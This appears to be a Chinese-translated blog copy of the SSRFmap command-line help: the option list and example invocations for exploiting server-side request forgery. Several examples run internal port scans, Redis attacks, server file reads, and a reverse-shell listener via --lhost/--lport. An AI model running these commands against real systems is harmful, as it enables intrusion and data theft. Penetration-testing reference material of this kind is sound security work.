SSRFmap-20210203

Usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l [HANDLER]] [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]]

可选参数:
  -h, --help                显示此帮助消息并退出
  -r REQFILE                SSRF请求文件
  -p PARAM                  目标SSRF参数
  -m MODULES                要启用的SSRF模块
  -l [HANDLER]              启动反向Shell的处理程序
  -v [VERBOSE]              启用详细信息
  --lhost LHOST             反向Shell的LHOST
  --lport LPORT             反向Shell的LPORT
  --rfiles [TARGETFILES]    使用readfiles模块读取的文件
  --uagent USERAGENT        要使用的用户代理
  --ssl [SSL]               使用未经验证的HTTPS
  --level [LEVEL]           要执行的测试级别 (1-5, default: 1)

示例:
  python ssrfmap.py -r data/request2.txt -p url -m portscan
  python ssrfmap.py -r data/request.txt -p url -m redis
  python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
  python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
  python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles

原文地址:https://www.cnblogs.com/f0rsaken/p/14610420.html